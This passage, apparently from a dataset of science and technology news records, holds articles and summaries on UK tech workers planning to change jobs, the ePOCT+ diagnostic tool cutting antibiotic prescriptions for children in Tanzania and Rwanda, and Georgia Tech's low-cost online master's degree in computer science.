roles. A survey of more than 30,000 global workers by Microsoft indicated that as many as 41% are considering leaving their job within a year. The UK's exit from the European Union makes things even more precarious for UK employers, squeezing the talent pipeline by making it more difficult for hiring managers to recruit skilled tech workers from overseas. SEE: Low-code development is helping businesses adapt to the 'double whammy' of Brexit and COVID (TechRepublic) Almost half of UK businesses (46%) told CWJobs they struggle to hire the technical skills they need, with 61% saying Brexit has made this even more difficult. As a result, over half (54%) said the skills gap has placed greater pressure on their technology workforce. Tom Lovell, managing director of tech skills at trade association techUK, said tech workers remained "crucial in building back the economy" as businesses emerged from the pandemic and demand for digital skills grew. "The UK has always had a historically strong technology industry, which has only been amplified by the pandemic. However, with mass movement expected, now is the time for businesses to focus on attracting and retaining top tech talent across the country," said Lovell. IT and technology workers have faced vastly increased workloads over the past 16 months, with burnout becoming a major issue amongst those tasked with propping up IT infrastructure and delivering new digital services. CWJob's research found that, while tech workers felt their efforts over previous months had been appreciated, they believed this gratitude would fade in the light of day as the pandemic subsided. Three-fifths of tech workers surveyed (62%) said they had felt more valued during the pandemic, while 52% said they experienced a boost to their job satisfaction over the past year. Yet four in 10 (38%) worried their role would be less valued as business continuity became less of a priority, with the same proportion believing their job satisfaction would decrease. Adrian Love, European recruitment director at Accenture, warned that a mass exodus of tech professionals risked putting digitization projects on ice at a time when investment in technology was accelerating. "After the last 18 months, employers are certainly aware of how crucial their tech workers are and are under no illusions when it comes to the importance of retaining tech talent," Love told ZDNet. "Tech skills across the board, but particularly in cloud, security, cyber, data and AI will continue to be highly sought after beyond the pandemic." Better pay and more flexible working arrangements could prove key to attracting and retaining skilled workers. SEE: The future of the office will surprise you. And if it doesn't, something has gone wrong Nearly two-thirds (63%) of tech workers surveyed by CWJobs said they wanted flexible working from their role, while 31% said they wanted a pay rise within the next 12 months. The same proportion said they wanted their organization to offer more mental health support. To avoid losing tech talent, companies must offer salaries and benefits packages that reflect the value they bring, said Dominic Harvey, director at CWJobs. "The pandemic has transformed the tech department's reputation, which is now seen as a fundamental driver of business success, and is valued by the board more than ever." At the same time, businesses risk losing prized tech workers, IT leaders face a number of hiring challenges when attempting to recruit new staff. Just over half (51%) of companies surveyed felt the competition for tech talent from other companies was too strong, while 46% reported difficulties in finding the specialist skills required for their teams. Internal capacity is also a problem for many, the study found: 46% of the IT leaders surveyed by CWJobs said HR teams lacked the tech knowledge required to make the right hires, while 43% said they struggled to recruit new talent at the pace required. SEE: Best coding bootcamps in 2021: Reputable coding camps Love said there was no "silver bullet solution" to the impending skills shortage, but noted that employees were more likely to engage with organizations that demonstrated a meaningful purpose, provided clear career progression, and offered an inclusive employee experience. Love also suggested that employers would need to re-think their approach to hiring to ensure they made the right decisions and maximized their potential to attract skilled technology workers. "All of this cannot just come from the recruitment teams or HR; it has to be a business-wide strategy," he told ZDNet. "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process and together thinking about how to attract, engage, assess and onboard broader pools of potential talent than ever before."
A survey of 1,000 technology workers and 500 IT decision makers by U.K. IT jobs board CWJobs found that only 29% of employees surveyed plan to remain at their current jobs for the next 12 months. When asked about their plans, 14% of tech workers said they would seek a new role at a different company, 11% planned to start their own business, 11% planned to go part-time, 11% planned to change locations, 10% planned to become a contractor, and 8% are considering a departure from the tech industry. Nearly two-thirds (63%) of tech workers surveyed said they desire flexible working arrangements, while another third (31%) would be seeking a pay raise in the coming year. To address the impending skills shortage, Accenture's Adrian Love said, "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process, and together thinking about how to attract, engage, assess, and onboard broader pools of potential talent than ever before."
[]
[]
[]
scitechnews
None
None
None
None
A survey of 1,000 technology workers and 500 IT decision makers by U.K. IT jobs board CWJobs found that only 29% of employees surveyed plan to remain at their current jobs for the next 12 months. When asked about their plans, 14% of tech workers said they would seek a new role at a different company, 11% planned to start their own business, 11% planned to go part-time, 11% planned to change locations, 10% planned to become a contractor, and 8% are considering a departure from the tech industry. Nearly two-thirds (63%) of tech workers surveyed said they desire flexible working arrangements, while another third (31%) would be seeking a pay raise in the coming year. To address the impending skills shortage, Accenture's Adrian Love said, "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process, and together thinking about how to attract, engage, assess, and onboard broader pools of potential talent than ever before." New research suggests that less than a third of tech workers plan to stay on in their current role - leaving organizations facing an exodus of digital skills as they emerge from the pandemic. A survey of 1,000 technology workers and 500 IT decision makers by careers platform CWJobs found that just 29% of employees intend on staying with their current employer for the next 12 months, with the majority planning to make career or lifestyle changes as life opens up again. CWJob's research found that 14% of tech workers would look for a new role at a different company, with others planning to establish their own business (11%), go part-time (11%), change locations (11%) or become a contractor (10%). Eight percent are contemplating leaving tech altogether. SEE: Best Microsoft technical certifications in 2021: Top exams CWJob's study offers yet another indicator that employers face a skills shortage in the coming months as employees make post-pandemic career moves. Tech departments were called upon to keep organizations moving forward as COVID-19 upended traditional businesses models and brought about the need for radical new ways of working. Developers and IT professionals bore the brunt of this, tasked with maintaining business continuity, introducing new digital services and navigating the industry-wide adoption of remote work in the space of a few short weeks. But as lockdown restrictions ease and organizations draw up their plans for the coming months, employers face what has been dubbed 'The Great Resignation' as employees - who have spent the past 16 months reflecting on their personal and professional priorities - prepare to move on. Research by HR software company Personio in May found that 38% of workers in the UK & Ireland plan to change roles in the next 6-12 months, rising to 58% amongst those in IT and computing roles. A survey of more than 30,000 global workers by Microsoft indicated that as many as 41% are considering leaving their job within a year. The UK's exit from the European Union makes things even more precarious for UK employers, squeezing the talent pipeline by making it more difficult for hiring managers to recruit skilled tech workers from overseas. SEE: Low-code development is helping businesses adapt to the 'double whammy' of Brexit and COVID (TechRepublic) Almost half of UK businesses (46%) told CWJobs they struggle to hire the technical skills they need, with 61% saying Brexit has made this even more difficult. As a result, over half (54%) said the skills gap has placed greater pressure on their technology workforce. Tom Lovell, managing director of tech skills at trade association techUK, said tech workers remained "crucial in building back the economy" as businesses emerged from the pandemic and demand for digital skills grew. "The UK has always had a historically strong technology industry, which has only been amplified by the pandemic. However, with mass movement expected, now is the time for businesses to focus on attracting and retaining top tech talent across the country," said Lovell. IT and technology workers have faced vastly increased workloads over the past 16 months, with burnout becoming a major issue amongst those tasked with propping up IT infrastructure and delivering new digital services. CWJob's research found that, while tech workers felt their efforts over previous months had been appreciated, they believed this gratitude would fade in the light of day as the pandemic subsided. Three-fifths of tech workers surveyed (62%) said they had felt more valued during the pandemic, while 52% said they experienced a boost to their job satisfaction over the past year. Yet four in 10 (38%) worried their role would be less valued as business continuity became less of a priority, with the same proportion believing their job satisfaction would decrease. Adrian Love, European recruitment director at Accenture, warned that a mass exodus of tech professionals risked putting digitization projects on ice at a time when investment in technology was accelerating. "After the last 18 months, employers are certainly aware of how crucial their tech workers are and are under no illusions when it comes to the importance of retaining tech talent," Love told ZDNet. "Tech skills across the board, but particularly in cloud, security, cyber, data and AI will continue to be highly sought after beyond the pandemic." Better pay and more flexible working arrangements could prove key to attracting and retaining skilled workers. SEE: The future of the office will surprise you. And if it doesn't, something has gone wrong Nearly two-thirds (63%) of tech workers surveyed by CWJobs said they wanted flexible working from their role, while 31% said they wanted a pay rise within the next 12 months. The same proportion said they wanted their organization to offer more mental health support. To avoid losing tech talent, companies must offer salaries and benefits packages that reflect the value they bring, said Dominic Harvey, director at CWJobs. "The pandemic has transformed the tech department's reputation, which is now seen as a fundamental driver of business success, and is valued by the board more than ever." At the same time, businesses risk losing prized tech workers, IT leaders face a number of hiring challenges when attempting to recruit new staff. Just over half (51%) of companies surveyed felt the competition for tech talent from other companies was too strong, while 46% reported difficulties in finding the specialist skills required for their teams. Internal capacity is also a problem for many, the study found: 46% of the IT leaders surveyed by CWJobs said HR teams lacked the tech knowledge required to make the right hires, while 43% said they struggled to recruit new talent at the pace required. SEE: Best coding bootcamps in 2021: Reputable coding camps Love said there was no "silver bullet solution" to the impending skills shortage, but noted that employees were more likely to engage with organizations that demonstrated a meaningful purpose, provided clear career progression, and offered an inclusive employee experience. Love also suggested that employers would need to re-think their approach to hiring to ensure they made the right decisions and maximized their potential to attract skilled technology workers. "All of this cannot just come from the recruitment teams or HR; it has to be a business-wide strategy," he told ZDNet. "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process and together thinking about how to attract, engage, assess and onboard broader pools of potential talent than ever before."
136
Antibiotics Use in Africa: ML vs. Magic Medicine
"I was surprised myself recently when we had a child in the consultation room and I thought 'This looks like a bacterial infection,'" recalls Godfrey Kavishe, a doctor at the National Institute for Medical Research in Tanzania. Kavishe was a few steps away from prescribing an antibiotic - they help fight bacterial infections. He kept wondering, though, why the child was breathing so quickly. So, he ran "point-of-care" tests, using an artificial intelligence tool called ePOCT+. "And the tool suggested that the child was more likely to have a viral pneumonia," says Kavishe. "I probably would have given an antibiotic. The tool was really helpful." An antibiotic, meanwhile, wouldn't have helped at all. In fact, antibiotics can do more harm than good when they are wrongly prescribed. For a start, researchers have long suggested that the more we use antibiotics , the less effective they are against infections. Then there's the cost of - essentially - wasted medication. They just don't work against viruses. It's money down the drain. "They can also prolong an illness," says Kavishe. "Maybe the child doesn't have diarrhea, but you give them an antibiotic and it causes diarrhea as a side effect." Kavishe is one of a number of primary healthcare workers who have been collaborating with a Swiss-based research project called DYNAMIC . The team behind DYNAMIC say they want to improve healthcare for children aged 0 to 15 years in African countries. And part of that goal is to reduce the use of antibiotics to treat illnesses that don't respond to them, such as viral infections. "Before COVID, most of the world didn't understand the difference between a virus and a bacterium, people had yet to grasp that most diseases are viral and that patients do not benefit from an antibiotic treatment," says DYNAMIC's project lead, Valérie D'Acremont at Unisanté in Lausanne. D'Acremont says the problem is universal. Antibiotics get over-prescribed everywhere. "There is a tendency even in Europe that as soon as you have a cough, a GP will give you an antibiotic. But they should only use antibiotics for serious cases, like a bacterial pneumonia," she D'Acremont. The situation in African countries is different, because some diseases are more prevalent there than in the richer, so-called "global north." "Antibiotics get used for fever, because fever is very worrying. As soon as you have a fever, especially in the 'global south,' where you have dangerous tropical diseases like malaria , meningitis or typhoid, clinicians get very nervous and they want to be on the safe side, so they prescribe an antibiotic," she says. It's something that Kavishe sees first-hand at the Mbeya Medical Research Center in Tanzania where he works. "About 70% of consultations in primary health facilities involve children, who are brought in with fever or a cough," Kavishe says. "And most infections in children are viral - an upper respiratory tract infection, for example. But the clinician will end up giving an antibiotic to treat a diagnosis that they probably don't even know because [they haven't been able to do] many of the tests that would confirm the diagnosis." Often it's through no direct fault of their own but a simple lack of equipment. And sometimes it's because health ministries in countries like Tanzania and Rwanda put out thick clinical guidelines, which are unheard of in Europe or North America, but which are deemed necessary in the global south to manage the situation that exists. D'Acremont and her colleague, Rainer Tan, are both medical doctors turned digital healthcare researchers. They have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. The tool aims to help clinicians, especially those who lack on-the-job experience, to make an accurate diagnosis and prescribe the right medicine or other treatment. This includes nurses in remote settings, or those who lack full training but are out there doing the job in the community because they are needed, or those who lack access to diagnostic testing tools, to make the right decisions. And it seems to be working. "You can imagine that as soon as you say you're going to restrict the use of antibiotics people get scared," says D'Acremont. "But the cure rate was better with our tool." They ran a pilot study in March 2021, involving 474 children and adolescents in Tanzania and Rwanda. It found that prescriptions of antibiotics dropped from 70% in Rwanda and 63% in Tanzania to 13% and 19% respectively when using ePOCT+. People also get scared when you tell them you're using an AI, especially when what you are really talking about is a machine learning algorithm that can teach and adapt itself. But the ePOCT+ makers say their tool is specifically designed to learn from local communities to help local communities. "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population," says Rainer Tan. "We can see how diseases change, whether it's dengue or malaria." Sticking with "static algorithms" that do not change, on the other hand, means "we risk mistreating patients," says Tan. "We need to adapt to what is happening in real life," he says. "And that is the beauty of machine learning optimized algorithms. They are learning from the data of the local population to result in better care for the people." It's also designed to be controlled by local clinicians who don't have top IT skills - for instance, if you're in a healthcare facility and the medicine that's available is not what you thought, you can update the app in real-time. "We asked six clinicians and they all believed the tool will lead to a better health care for children and that it will improve their skills," says Kavishe. "It helps them with what drugs to prescribe. It even recommends the dosage based on the weight of the child." The ePOCT+ tool is heading into further trials and will slowly expand to other regions and eventually other countries, perhaps Senegal, Kenya and India. Valérie and Rainer hope it will continue to show it's helping doctors and nurses make better decisions. "You are not done just by saying 'Nobody takes antibiotics, we decrease resistance, and we are happy.' Yes, we do that, but at the same time we also have to improve the identification of the very few cases with children who really do need an antibiotic, and that is very challenging," says D'Acremont. But one question remains: Does it fix the root problem? Kavishe says that some parents think antibiotics are a "magic medicine." He says viral infections are "self-limiting, so they go away after a while." And if a parent gets an antibiotic for their child's viral infection and it goes away, they sometimes think that it is because of the antibiotic, even though it did nothing to fight the virus, and they will expect to get antibiotics next time as well. But if a doctor refuses to give them antibiotics, they often buy them over-the-counter in stores, even without a prescription. "Often in local drug shops, people will sell antibiotics without a prescription. And that might be a gap in the tool, that it doesn't stop people buying a medication outside," Kavishe says. "But with the knowledge and advice we give during a consultation, we hope at some point these parents and caregivers will understand the implications of antibiotics and stop giving them unnecessarily." DYNAMIC is a collaboration between the Centre for Primary Care and Public Health (Unisanté), University of Lausanne , the Swiss Tropical and Public Health Institute (Swiss TPH), and their partners in Tanzania and Rwanda. It is funded by Fondation Botnar , an organization that promotes the use of digital technologies in healthcare.
Swiss scientists and African doctors are using a machine learning algorithm to help physicians prescribe fewer antibiotics to children in Africa, or only when necessary. Researchers participating in the Swiss-based DYNAMIC project designed the ePOCT+ artificial intelligence tool to help healthcare workers make accurate diagnoses and prescribe the right drugs or other treatment. Its developers say ePOCT+ is designed to learn from local communities to help local communities. Rainer Tan at Switzerland's Center for Primary Care and Public Health said, "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population." The researchers have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. Godfrey Kavishe at Tanzania's National Institute for Medical Research hopes the tool will stop unnecessary overuse of antibiotics, which some parents in Africa mistake for "magic medicine."
[]
[]
[]
scitechnews
None
None
None
None
Swiss scientists and African doctors are using a machine learning algorithm to help physicians prescribe fewer antibiotics to children in Africa, or only when necessary. Researchers participating in the Swiss-based DYNAMIC project designed the ePOCT+ artificial intelligence tool to help healthcare workers make accurate diagnoses and prescribe the right drugs or other treatment. Its developers say ePOCT+ is designed to learn from local communities to help local communities. Rainer Tan at Switzerland's Center for Primary Care and Public Health said, "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population." The researchers have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. Godfrey Kavishe at Tanzania's National Institute for Medical Research hopes the tool will stop unnecessary overuse of antibiotics, which some parents in Africa mistake for "magic medicine." "I was surprised myself recently when we had a child in the consultation room and I thought 'This looks like a bacterial infection,'" recalls Godfrey Kavishe, a doctor at the National Institute for Medical Research in Tanzania. Kavishe was a few steps away from prescribing an antibiotic - they help fight bacterial infections. He kept wondering, though, why the child was breathing so quickly. So, he ran "point-of-care" tests, using an artificial intelligence tool called ePOCT+. "And the tool suggested that the child was more likely to have a viral pneumonia," says Kavishe. "I probably would have given an antibiotic. The tool was really helpful." An antibiotic, meanwhile, wouldn't have helped at all. In fact, antibiotics can do more harm than good when they are wrongly prescribed. For a start, researchers have long suggested that the more we use antibiotics , the less effective they are against infections. Then there's the cost of - essentially - wasted medication. They just don't work against viruses. It's money down the drain. "They can also prolong an illness," says Kavishe. "Maybe the child doesn't have diarrhea, but you give them an antibiotic and it causes diarrhea as a side effect." Kavishe is one of a number of primary healthcare workers who have been collaborating with a Swiss-based research project called DYNAMIC . The team behind DYNAMIC say they want to improve healthcare for children aged 0 to 15 years in African countries. And part of that goal is to reduce the use of antibiotics to treat illnesses that don't respond to them, such as viral infections. "Before COVID, most of the world didn't understand the difference between a virus and a bacterium, people had yet to grasp that most diseases are viral and that patients do not benefit from an antibiotic treatment," says DYNAMIC's project lead, Valérie D'Acremont at Unisanté in Lausanne. D'Acremont says the problem is universal. Antibiotics get over-prescribed everywhere. "There is a tendency even in Europe that as soon as you have a cough, a GP will give you an antibiotic. But they should only use antibiotics for serious cases, like a bacterial pneumonia," she D'Acremont. The situation in African countries is different, because some diseases are more prevalent there than in the richer, so-called "global north." "Antibiotics get used for fever, because fever is very worrying. As soon as you have a fever, especially in the 'global south,' where you have dangerous tropical diseases like malaria , meningitis or typhoid, clinicians get very nervous and they want to be on the safe side, so they prescribe an antibiotic," she says. It's something that Kavishe sees first-hand at the Mbeya Medical Research Center in Tanzania where he works. "About 70% of consultations in primary health facilities involve children, who are brought in with fever or a cough," Kavishe says. "And most infections in children are viral - an upper respiratory tract infection, for example. But the clinician will end up giving an antibiotic to treat a diagnosis that they probably don't even know because [they haven't been able to do] many of the tests that would confirm the diagnosis." Often it's through no direct fault of their own but a simple lack of equipment. And sometimes it's because health ministries in countries like Tanzania and Rwanda put out thick clinical guidelines, which are unheard of in Europe or North America, but which are deemed necessary in the global south to manage the situation that exists. D'Acremont and her colleague, Rainer Tan, are both medical doctors turned digital healthcare researchers. They have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. The tool aims to help clinicians, especially those who lack on-the-job experience, to make an accurate diagnosis and prescribe the right medicine or other treatment. This includes nurses in remote settings, or those who lack full training but are out there doing the job in the community because they are needed, or those who lack access to diagnostic testing tools, to make the right decisions. And it seems to be working. "You can imagine that as soon as you say you're going to restrict the use of antibiotics people get scared," says D'Acremont. "But the cure rate was better with our tool." They ran a pilot study in March 2021, involving 474 children and adolescents in Tanzania and Rwanda. It found that prescriptions of antibiotics dropped from 70% in Rwanda and 63% in Tanzania to 13% and 19% respectively when using ePOCT+. People also get scared when you tell them you're using an AI, especially when what you are really talking about is a machine learning algorithm that can teach and adapt itself. But the ePOCT+ makers say their tool is specifically designed to learn from local communities to help local communities. "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population," says Rainer Tan. "We can see how diseases change, whether it's dengue or malaria." Sticking with "static algorithms" that do not change, on the other hand, means "we risk mistreating patients," says Tan. "We need to adapt to what is happening in real life," he says. "And that is the beauty of machine learning optimized algorithms. They are learning from the data of the local population to result in better care for the people." It's also designed to be controlled by local clinicians who don't have top IT skills - for instance, if you're in a healthcare facility and the medicine that's available is not what you thought, you can update the app in real-time. "We asked six clinicians and they all believed the tool will lead to a better health care for children and that it will improve their skills," says Kavishe. "It helps them with what drugs to prescribe. It even recommends the dosage based on the weight of the child." The ePOCT+ tool is heading into further trials and will slowly expand to other regions and eventually other countries, perhaps Senegal, Kenya and India. Valérie and Rainer hope it will continue to show it's helping doctors and nurses make better decisions. "You are not done just by saying 'Nobody takes antibiotics, we decrease resistance, and we are happy.' Yes, we do that, but at the same time we also have to improve the identification of the very few cases with children who really do need an antibiotic, and that is very challenging," says D'Acremont. But one question remains: Does it fix the root problem? Kavishe says that some parents think antibiotics are a "magic medicine." He says viral infections are "self-limiting, so they go away after a while." And if a parent gets an antibiotic for their child's viral infection and it goes away, they sometimes think that it is because of the antibiotic, even though it did nothing to fight the virus, and they will expect to get antibiotics next time as well. But if a doctor refuses to give them antibiotics, they often buy them over-the-counter in stores, even without a prescription. "Often in local drug shops, people will sell antibiotics without a prescription. And that might be a gap in the tool, that it doesn't stop people buying a medication outside," Kavishe says. "But with the knowledge and advice we give during a consultation, we hope at some point these parents and caregivers will understand the implications of antibiotics and stop giving them unnecessarily." DYNAMIC is a collaboration between the Centre for Primary Care and Public Health (Unisanté), University of Lausanne , the Swiss Tropical and Public Health Institute (Swiss TPH), and their partners in Tanzania and Rwanda. It is funded by Fondation Botnar , an organization that promotes the use of digital technologies in healthcare.
137
Georgia Tech's Online MS in Computer Science Continues to Thrive. Why That's Important for the Future of MOOCs
What may be the most successful online graduate degree program in the United States - the Online Master of Science in Computer Science (OMSCS) from the Georgia Institute of Technology (Georgia Tech) - has begun its eighth year of operation. The program started in January 2014 with an inaugural class of 380 students and five courses. It's enjoyed steady growth every year since, and now has more than 11,000 students enrolled in more than 50 courses. making it the largest computing master's program in the nation - and probably the world. Its total number of graduates now tops 5,000. One of the noteworthy features of the OMSCS is that it's shown how successful MOOCs - the massive open online courses generally believed to have not lived up to their initial hype and promise - can be. Although something resembling MOOCs existed earlier, the MOOC movement is typically thought to have begun in 2011 when Stanford University launched three such courses, the first of which was Introduction To AI , by Sebastian Thrun and Peter Norvig , a course that attracted an enrollment of 160,000 students. It was quickly followed by two more MOOCs, developed by Andrew Ng and Jennifer Widom . Thrun soon started Udacity , and Daphne Koller and Andrew Ng launched Coursera . Initially, MOOCs were regarded as an instructional method that would revolutionize and democratize higher education, but they've been plagued by several problems, most notably high rates of student attrition . As a result, doubts about their future have lingered, even as major platforms such as Coursera and Udacity continue to evolve their business models, enabled in part by the impact of the coronavirus pandemic, and major mergers like the one this week between 2U and edX point to a robust online potential. Georgia Tech's OMSCS has managed to overcome those problems, serving as an example of how a combination of faculty quality, high academic expectations, a modest price tag, and strong student support services can make MOOC-based higher education successful. The development of the program is a story in itself. It's the result of a discussion between Dr. Zvi Galil, who served as the John P. Imlay, Jr., Dean of Computing at Georgia Tech from 2010 through 2019 and Sebastian Thrun. With $2 million in support from ATT, Galil began the Online Master of Science in Computer Science and oversaw it for its first five years, making it into what is generally regarded as the first affordable fully online Master's degree in the U.S. You can hear Dr. Galil's highly engaging description of the program in his own words here . Born in Tel Aviv, Galil earned his bachelor's and master's degrees in applied mathematics from Tel Aviv University before being awarded a PhD. in computer science by Cornell University in 1975. A world-recognized expert in theoretical computer science, he has particular expertise in string algorithms and graph algorithms. He coined the broadly used terms, stringology and sparsification. Prior to coming to Georgia Tech, Galil served as chair of the computer science department at both Tel Aviv University and Columbia University. For more than a decade he was dean of Columbia's Fu Foundation School of Engineering and Applied Science (1995 - 2007). In 2007, he was named president of Tel Aviv University, a position he held until his resignation in 2009. A member of the National Academy of Engineering and a fellow of the American Academy of Arts and Sciences, Galil was recently named one of the 10 most influential computer scientists in the last decade by Academic Influence. One might assume that with that distinguished career Galil would regard the development of an online master's program to be a bit anticlimactic. To the contrary, he believes OMSCS is the "biggest thing I've done in my life," pointing to the fact that OMSCS runs on a model that challenges the prevailing brand of most elite universities, who take pride in their selectivity and exclusiveness. OMSCS accepts all applicants who meet the program's basic qualifications. So far, it's accepted 74% of those who've applied. By contrast, the acceptance rate for Georgia Tech's on-campus program is about 10%. Students from all 50 states and 124 countries have enrolled in the program, which earns rave reviews from its alumni. Affordability is key to the program's popularity. OMSCS is the most affordable degree of its kind. Tuition runs just a bit over $7,000 for the entire program, about 10% of the cost of the average on-campus MS in computer science at private universities. As Galil says, "Our motto is accessibility through affordability and technology - we are making a Master's degree in computer science available to thousands of students." Other major universities have followed the OMSCS lead, and now there are about 40 MOOC-based online graduate programs offered by about 30 U.S. universities. But the question remains - particularly in the aftermath of the pandemic-driven pivot to online instruction - whether MOOCs can effectively serve a larger undergraduate market, particularly given the lukewarm reception online learning received from students and faculty this past year. In an interview this week, I asked Dr. Galil, recently named by the Wall Street Journal as " the man who made online college work ." whether he believed MOOCs could be scaled to deliver an affordable, high-quality undergraduate education. He told me he was convinced that not only was it possible, but that it could bring an excellent education into reach for far more students. That optimism is based, in part, on Georgia Tech's successful expansion of MOOCs to its own undergraduates. In 2017, the College of Computing offered an online section of its introductory computing course to on-campus students. Over half of the 300+ students taking the course have enrolled in the online section ever since. Student performance in the online and the in-class sections has been comparable; in some cases, the online section has scored slightly higher. In 2019, George Tech opened up two more introductory computing online courses to on-campus students. Galil's vision is that adding more online course options can help students earn a degree at a lower cost. Prospective students can take introductory courses online during or immediately after high school. Enrolled students can take online courses on campus or while on summer breaks, or during internships or co-ops. Upper-division students can complete their degrees by taking online courses while already working. "And all of this can be done at a lesser tuition rate, reducing the overall cost of college," he said. Galil advocates for "a pivot towards an integrative undergraduate curriculum - part on-campus, part online" that he believes can be comparable in academic quality and learning outcomes to on-campus classes. The key ingredients to students embracing that pivot are "quality, quality, quality," according to Galil. It takes time for faculty to develop high-quality, engaging online courses, and time was one resource that universities did not have during the almost-overnight, pandemic-forced conversion to online instruction. As a result, reliance on zoomed classes resulted in a drop in student engagement, putting the wrong kind of "distance" in distance education. But Galil believes well-conceived online courses can actually promote student engagement, particularly when accompanied - as they have been at Georgia Tech - with the sprouting of student groups who affiliate through social media. Galil remains bullish on the future of MOOCs and their potential for undergraduate education. "They will provide access to high quality education to a wider student population, unserved by the current system of exclusion and escalating tuition. The idea and role of higher education institutes is to contribute to society through education. As technology provides the means to place higher education within reach of a greater number of people, our colleges and universities can fulfill their mission."
The Georgia Institute of Technology's Online Master of Science in Computer Science (OMSCS), now in its eighth year, is critical to massive open online courses (MOOCs) fulfilling their promise. High learner attrition has undermined faith in MOOCs, but OMSCS avoided this by combining quality faculty, high academic expectations, modest cost, and robust student support services. The program's affordability is its chief incentive, costing little more than $7,000 in all, or about 10% of the cost of the average on-campus master's degree in computer science at private universities. Zvi Galil, who designed the program, said MOOCs "provide access to high-quality education to a wider student population unserved by the current system of exclusion and escalating tuition."
[]
[]
[]
scitechnews
None
None
None
None
The Georgia Institute of Technology's Online Master of Science in Computer Science (OMSCS), now in its eighth year, is critical to massive open online courses (MOOCs) fulfilling their promise. High learner attrition has undermined faith in MOOCs, but OMSCS avoided this by combining quality faculty, high academic expectations, modest cost, and robust student support services. The program's affordability is its chief incentive, costing little more than $7,000 in all, or about 10% of the cost of the average on-campus master's degree in computer science at private universities. Zvi Galil, who designed the program, said MOOCs "provide access to high-quality education to a wider student population unserved by the current system of exclusion and escalating tuition." What may be the most successful online graduate degree program in the United States - the Online Master of Science in Computer Science (OMSCS) from the Georgia Institute of Technology (Georgia Tech) - has begun its eighth year of operation. The program started in January 2014 with an inaugural class of 380 students and five courses. It's enjoyed steady growth every year since, and now has more than 11,000 students enrolled in more than 50 courses. making it the largest computing master's program in the nation - and probably the world. Its total number of graduates now tops 5,000. One of the noteworthy features of the OMSCS is that it's shown how successful MOOCs - the massive open online courses generally believed to have not lived up to their initial hype and promise - can be. Although something resembling MOOCs existed earlier, the MOOC movement is typically thought to have begun in 2011 when Stanford University launched three such courses, the first of which was Introduction To AI , by Sebastian Thrun and Peter Norvig , a course that attracted an enrollment of 160,000 students. It was quickly followed by two more MOOCs, developed by Andrew Ng and Jennifer Widom . Thrun soon started Udacity , and Daphne Koller and Andrew Ng launched Coursera . Initially, MOOCs were regarded as an instructional method that would revolutionize and democratize higher education, but they've been plagued by several problems, most notably high rates of student attrition . As a result, doubts about their future have lingered, even as major platforms such as Coursera and Udacity continue to evolve their business models, enabled in part by the impact of the coronavirus pandemic, and major mergers like the one this week between 2U and edX point to a robust online potential. Georgia Tech's OMSCS has managed to overcome those problems, serving as an example of how a combination of faculty quality, high academic expectations, a modest price tag, and strong student support services can make MOOC-based higher education successful. The development of the program is a story in itself. It's the result of a discussion between Dr. Zvi Galil, who served as the John P. Imlay, Jr., Dean of Computing at Georgia Tech from 2010 through 2019 and Sebastian Thrun. With $2 million in support from ATT, Galil began the Online Master of Science in Computer Science and oversaw it for its first five years, making it into what is generally regarded as the first affordable fully online Master's degree in the U.S. You can hear Dr. Galil's highly engaging description of the program in his own words here . Born in Tel Aviv, Galil earned his bachelor's and master's degrees in applied mathematics from Tel Aviv University before being awarded a PhD. in computer science by Cornell University in 1975. A world-recognized expert in theoretical computer science, he has particular expertise in string algorithms and graph algorithms. He coined the broadly used terms, stringology and sparsification. Prior to coming to Georgia Tech, Galil served as chair of the computer science department at both Tel Aviv University and Columbia University. For more than a decade he was dean of Columbia's Fu Foundation School of Engineering and Applied Science (1995 - 2007). In 2007, he was named president of Tel Aviv University, a position he held until his resignation in 2009. A member of the National Academy of Engineering and a fellow of the American Academy of Arts and Sciences, Galil was recently named one of the 10 most influential computer scientists in the last decade by Academic Influence. One might assume that with that distinguished career Galil would regard the development of an online master's program to be a bit anticlimactic. To the contrary, he believes OMSCS is the "biggest thing I've done in my life," pointing to the fact that OMSCS runs on a model that challenges the prevailing brand of most elite universities, who take pride in their selectivity and exclusiveness. OMSCS accepts all applicants who meet the program's basic qualifications. So far, it's accepted 74% of those who've applied. By contrast, the acceptance rate for Georgia Tech's on-campus program is about 10%. Students from all 50 states and 124 countries have enrolled in the program, which earns rave reviews from its alumni. Affordability is key to the program's popularity. OMSCS is the most affordable degree of its kind. Tuition runs just a bit over $7,000 for the entire program, about 10% of the cost of the average on-campus MS in computer science at private universities. As Galil says, "Our motto is accessibility through affordability and technology - we are making a Master's degree in computer science available to thousands of students." Other major universities have followed the OMSCS lead, and now there are about 40 MOOC-based online graduate programs offered by about 30 U.S. universities. But the question remains - particularly in the aftermath of the pandemic-driven pivot to online instruction - whether MOOCs can effectively serve a larger undergraduate market, particularly given the lukewarm reception online learning received from students and faculty this past year. In an interview this week, I asked Dr. Galil, recently named by the Wall Street Journal as " the man who made online college work ." whether he believed MOOCs could be scaled to deliver an affordable, high-quality undergraduate education. He told me he was convinced that not only was it possible, but that it could bring an excellent education into reach for far more students. That optimism is based, in part, on Georgia Tech's successful expansion of MOOCs to its own undergraduates. In 2017, the College of Computing offered an online section of its introductory computing course to on-campus students. Over half of the 300+ students taking the course have enrolled in the online section ever since. Student performance in the online and the in-class sections has been comparable; in some cases, the online section has scored slightly higher. In 2019, George Tech opened up two more introductory computing online courses to on-campus students. Galil's vision is that adding more online course options can help students earn a degree at a lower cost. Prospective students can take introductory courses online during or immediately after high school. Enrolled students can take online courses on campus or while on summer breaks, or during internships or co-ops. Upper-division students can complete their degrees by taking online courses while already working. "And all of this can be done at a lesser tuition rate, reducing the overall cost of college," he said. Galil advocates for "a pivot towards an integrative undergraduate curriculum - part on-campus, part online" that he believes can be comparable in academic quality and learning outcomes to on-campus classes. The key ingredients to students embracing that pivot 